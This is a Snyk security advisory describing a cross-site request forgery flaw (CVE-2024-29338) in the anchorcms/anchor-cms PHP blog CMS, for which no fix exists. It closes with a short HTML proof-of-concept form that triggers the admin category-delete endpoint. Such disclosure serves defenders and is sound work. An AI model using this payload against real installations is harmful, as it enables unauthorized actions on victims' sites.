Cross-Site Request Forgery (CSRF) Affecting anchorcms/anchor-cms package, versions >=0.0.0
Snyk CVSS
Attack Complexity
Low
User Interaction
Required
Scope
Changed
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.04% (9th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PHP-ANCHORCMSANCHORCMS-6483245
- published 24 Mar 2024
- disclosed 22 Mar 2024
- credit PWwwww123
Introduced: 22 Mar 2024
CVE-2024-29338 Open this link in a new tabHow to fix?
There is no fixed version for anchorcms/anchor-cms.
Overview
anchorcms/anchor-cms is a lightweight blog CMS for PHP.
Affected versions of this package are vulnerable to Cross-Site Request Forgery (CSRF) via the /anchor/admin/categories/delete/2 endpoint. An attacker can perform unauthorized actions on behalf of a legitimate user by tricking the user into clicking a malicious link or visiting a crafted webpage.
PoC
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/anchor/admin/categories/delete/2">
<input type="submit" value="Submit request" />
</form>
</body>
</html>